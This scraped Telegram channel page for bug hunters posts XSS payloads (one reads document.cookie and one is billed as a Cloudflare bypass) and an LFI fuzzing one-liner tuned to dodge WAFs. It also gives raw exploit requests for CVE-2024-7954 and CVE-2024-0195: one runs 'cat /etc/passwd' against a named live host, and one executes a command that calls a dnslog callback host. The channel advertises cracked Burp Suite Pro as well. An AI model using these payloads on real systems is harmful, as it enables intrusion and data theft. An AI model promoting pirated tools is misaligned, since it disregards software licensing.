haxshadow
4.2K subscribers
86 photos
1 video
27 files
141 links
ᴛʜɪs ᴄʜᴀɴɴᴇʟ ɪs ᴀʟʟ ᴀʙᴏᴜᴛ Bᴜɢ ʜᴜɴᴛɪɴɢ ﹠ Cʏʙᴇʀsᴇᴄ ﹠ Eᴛʜɪᴄᴀʟ Hᴀᴄᴋɪɴɢ ʀᴇʟᴀᴛᴇᴅ ᴄᴏɴᴛᴇɴᴛs.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
IF you want to support ;)
Download Telegram
4👏4🤣3👍1💩1
haxshadow
https://youtu.be/EUBhZOFAcxA
XSS Payload

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><img src=x onerror=confirm(document.cookie)>

<sVg/onLy=1 onLoaD=confirm(1)//
I am back ..
Burp Suite Pro v2024.7.1 Cracked
try this amazingg xss scanner made by our brother sarper its so fast bcz of new method it can scan 1k urls in just 5-20 sec with 99% success rate it scan urls with xss polyglots payloads and run on all urls parameters just put all urls in wordlist file ones you get hit just open that link directly and xss popup show ❤️
https://github.com/sarperavci/MXS
👍21
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's

waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done



waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt


cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3
CVE-2024-7954.yaml
1.7 KB
POST /index.php?action=porte_plume_previsu HTTP/2
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Channel name was changed to «Mr.Shadow»
CVE-2024-0195.yaml
2.1 KB
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
👍1